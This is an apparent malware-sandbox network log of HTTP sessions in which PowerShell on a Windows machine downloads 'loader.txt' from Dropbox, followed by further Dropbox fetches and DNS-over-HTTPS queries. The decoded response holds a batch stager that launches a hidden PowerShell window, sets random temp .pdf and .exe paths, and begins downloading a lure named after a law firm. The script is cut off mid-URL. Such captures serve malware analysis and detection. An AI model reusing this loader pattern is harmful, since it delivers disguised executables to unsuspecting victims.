                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:22 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                                        Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:22 UTC58INData Raw: 4d 53 2d 43 56 3a 20 33 5a 35 47 62 74 36 37 53 30 61 47 52 73 79 31 72 58 68 62 36 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                                        Data Ascii: MS-CV: 3Z5Gbt67S0aGRsy1rXhb6w.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                        5192.168.2.649731162.125.65.18443712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:23 UTC212OUTGET /scl/fi/ic3qrv251eb3hefiq4cgw/loader.txt?rlkey=dhptqx5w48vzhc81an0mgw37n&dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                                                        Host: www.dropbox.com
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:24 UTC4091INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                        Content-Security-Policy: form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https [TRUNCATED]
                                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                        Location: https://ucf3844d75e14616ab432386c10a.dl.dropboxusercontent.com/cd/0/get/CgBJN8EsfGTe3jsM3L3IkAoL9wJSokD2hyVD-dcxpjXcFTByRIcbskJLZyy0o7030MuxoI7EdVmq-TNAF7rSw-K-1cAfSNrJf0Ks95n6UjNOWo3DxcvubcK30hHCRV8lh6o7N0wHaG86Cjy_nyNLs1VS/file?dl=1#
                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                        Set-Cookie: gvc=MjgxMTYzMzAyNzk3Mjk1OTA0OTk5ODk1MTA2MTIxNTY4NDgwODcw; Path=/; Expires=Sun, 09 Dec 2029 17:40:24 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                        Set-Cookie: t=bePPTOGSYaVPQs8rZV8ZBrXw; Path=/; Domain=dropbox.com; Expires=Wed, 10 Dec 2025 17:40:24 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                        Set-Cookie: __Host-js_csrf=bePPTOGSYaVPQs8rZV8ZBrXw; Path=/; Expires=Wed, 10 Dec 2025 17:40:24 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                        Set-Cookie: __Host-ss=O9s73VxFcc; Path=/; Expires=Wed, 10 Dec 2025 17:40:24 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                                                                                                        Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Sun, 09 Dec 2029 17:40:24 GMT
                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                                                        X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                        Content-Length: 17
                                                                                                                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 17:40:24 GMT
                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                                                                        X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                                                        X-Dropbox-Request-Id: b42827ace1304c1ebfca1ab1db723c45
                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:24 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                                                                                                                        Data Ascii: ...status=302-->


                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                        6192.168.2.649742162.125.69.15443712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:26 UTC370OUTGET /cd/0/get/CgBJN8EsfGTe3jsM3L3IkAoL9wJSokD2hyVD-dcxpjXcFTByRIcbskJLZyy0o7030MuxoI7EdVmq-TNAF7rSw-K-1cAfSNrJf0Ks95n6UjNOWo3DxcvubcK30hHCRV8lh6o7N0wHaG86Cjy_nyNLs1VS/file?dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                                                        Host: ucf3844d75e14616ab432386c10a.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:27 UTC734INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=60
                                                                                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="loader.txt"; filename*=UTF-8''loader.txt
                                                                                                                                                                                                                                                                                                                        Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                                                        Etag: 1733738002307508d
                                                                                                                                                                                                                                                                                                                        Pragma: public
                                                                                                                                                                                                                                                                                                                        Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                                                                                                                                        X-Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                        X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                                                        X-Server-Response-Time: 180
                                                                                                                                                                                                                                                                                                                        X-Webkit-Csp: sandbox
                                                                                                                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 17:40:27 GMT
                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                        Content-Length: 519
                                                                                                                                                                                                                                                                                                                        X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                                                        X-Dropbox-Request-Id: 6717b315c22242ffb933475a74c3e1da
                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:27 UTC519INData Raw: 40 65 63 68 6f 20 6f 66 66 0d 0a 70 6f 77 65 72 73 68 65 6c 6c 20 2d 57 69 6e 64 6f 77 53 74 79 6c 65 20 48 69 64 64 65 6e 20 2d 43 6f 6d 6d 61 6e 64 20 5e 0d 0a 20 20 20 20 22 24 52 61 6e 64 6f 6d 50 44 46 20 3d 20 5c 22 24 65 6e 76 3a 74 65 6d 70 5c 24 28 47 65 74 2d 52 61 6e 64 6f 6d 29 2e 70 64 66 5c 22 3b 20 24 52 61 6e 64 6f 6d 45 58 45 20 3d 20 5c 22 24 65 6e 76 3a 74 65 6d 70 5c 24 28 47 65 74 2d 52 61 6e 64 6f 6d 29 2e 65 78 65 5c 22 3b 20 49 57 52 20 2d 55 72 69 20 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 72 6f 70 62 6f 78 2e 63 6f 6d 2f 73 63 6c 2f 66 69 2f 64 67 69 75 72 36 34 76 61 77 6d 64 78 39 61 6c 71 77 36 65 74 2f 4c 65 77 69 73 2d 53 69 6c 6b 69 6e 2d 4c 4c 50 2e 70 64 66 3f 72 6c 6b 65 79 3d 6b 64 75 68 71 72 6e 70 30 30 72 6a 34 34
                                                                                                                                                                                                                                                                                                                        Data Ascii: @echo offpowershell -WindowStyle Hidden -Command ^ "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44


                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                        7192.168.2.649750162.125.65.184437420C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:28 UTC764OUTGET /scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                        Host: www.dropbox.com
                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                        Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:29 UTC4094INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                        Content-Security-Policy: connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; media-src https://* blob: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https: [TRUNCATED]
                                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                        Location: https://ucd17e98c22878db2872ebfcb27c.dl.dropboxusercontent.com/cd/0/get/CgAV6hxZ-A3hQzTu2Stg3LHFDeMnudBRIOasHxeY3jHwYLSfARGUmzl5s0_-flqSUCT-0eeqW-WUyn6n4GefjtH9u4MSRz2brkZ7vKHaMcGku5sFmxi4aIg5GYOzhOBlVWy5vDL2jJ-0e5yl43IRZEtV/file?dl=1#
                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                        Set-Cookie: gvc=NTc0NTc0OTg2NDczMjEwMDY2MDY2MDI5NzQzMDY4NDk2MTcyODk=; Path=/; Expires=Sun, 09 Dec 2029 17:40:29 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                        Set-Cookie: t=bjBqggnwVCiDbpG5UJUtWZTJ; Path=/; Domain=dropbox.com; Expires=Wed, 10 Dec 2025 17:40:29 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                        Set-Cookie: __Host-js_csrf=bjBqggnwVCiDbpG5UJUtWZTJ; Path=/; Expires=Wed, 10 Dec 2025 17:40:29 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                        Set-Cookie: __Host-ss=l4HzjLugbc; Path=/; Expires=Wed, 10 Dec 2025 17:40:29 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                                                                                                        Set-Cookie: locale=en_GB; Path=/; Domain=dropbox.com; Expires=Sun, 09 Dec 2029 17:40:29 GMT
                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                                                        X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                        Content-Length: 17
                                                                                                                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 17:40:29 GMT
                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                                                                        X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                                                        X-Dropbox-Request-Id: f383da75f0f7432786120a84337cf7af
                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:29 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                                                                                                                        Data Ascii: ...status=302-->


                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                        8192.168.2.649761162.125.65.184436976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:31 UTC246OUTGET /scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                                                        Host: www.dropbox.com
                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:32 UTC4091INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                        Content-Security-Policy: child-src https://www.dropbox.com/static/serviceworker/ blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; frame-ancestors 'self' https://*.dropbox.com ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; font-src https://* data: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; media-src https://* blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ [TRUNCATED]
                                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                        Location: https://uc0a94dea147da368ca578e9c165.dl.dropboxusercontent.com/cd/0/get/CgCh17DjAot4f81U6ef-GP-6FG4okX8Og2zouwNyixm_AL2LxxJza7GzwZwN01fuHYucSY8eB_yzYhlfC1H3ZArjYrqXbVPaFd7BkA--Kny9hSL_9DMJZA6pOdQ5xxuhOyzp5h0kKcr1Wl3kKDYeO493/file?dl=1#
                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                        Set-Cookie: gvc=MjY2MDM4NTExNjI4MjU5ODczMTU3ODA1MTAyNDg2Njg1NDE2MDI=; Path=/; Expires=Sun, 09 Dec 2029 17:40:31 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                        Set-Cookie: t=RzmmyJPCXcU-JumlFzjzYrUj; Path=/; Domain=dropbox.com; Expires=Wed, 10 Dec 2025 17:40:31 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                        Set-Cookie: __Host-js_csrf=RzmmyJPCXcU-JumlFzjzYrUj; Path=/; Expires=Wed, 10 Dec 2025 17:40:31 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                        Set-Cookie: __Host-ss=YWJna4srTo; Path=/; Expires=Wed, 10 Dec 2025 17:40:31 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                                                                                                        Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Sun, 09 Dec 2029 17:40:31 GMT
                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                                                        X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                        Content-Length: 17
                                                                                                                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 17:40:31 GMT
                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                                                                        X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                                                        X-Dropbox-Request-Id: 96d4199b09e244298de1aab87c6a8df0
                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:32 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                                                                                                                        Data Ascii: ...status=302-->


                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                        9192.168.2.649768172.64.41.34437420C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:31 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:31 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:31 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 17:40:31 GMT
                                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                                                                                        CF-RAY: 8eff05424fce7c84-EWR
                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:31 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 24 00 04 8e fa 48 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom$Hc)


                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                        10192.168.2.649767172.64.41.34437420C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:31 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:31 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:31 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 17:40:31 GMT
                                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                                                                                        CF-RAY: 8eff05424cad43d3-EWR
                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:31 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 cd 00 04 8e fa 41 e3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcomA)


                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                        11192.168.2.649772172.64.41.34437420C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:31 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:31 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:31 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 17:40:31 GMT
                                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                                                                                        CF-RAY: 8eff0542ab89421b-EWR
                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
